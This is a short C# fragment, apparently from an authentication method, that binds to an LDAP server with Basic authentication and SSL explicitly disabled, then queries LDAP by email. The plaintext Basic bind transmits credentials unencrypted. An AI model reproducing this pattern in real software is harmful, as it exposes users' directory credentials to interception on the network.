using (LdapConnection connection = new LdapConnection(ldapId, network, AuthType.Basic))
{
try
{
connection.SessionOptions.SecureSocketLayer = false;
connection.SessionOptions.ProtocolVersion = 3;
connection.Bind();
connection.Dispose();
return queryLdap(email);
}
catch (LdapException ex)
{
throw new BusinessException(ex.Message);
}
catch (Exception e)
{
throw new PlatformException(e.Message);
}
}
}
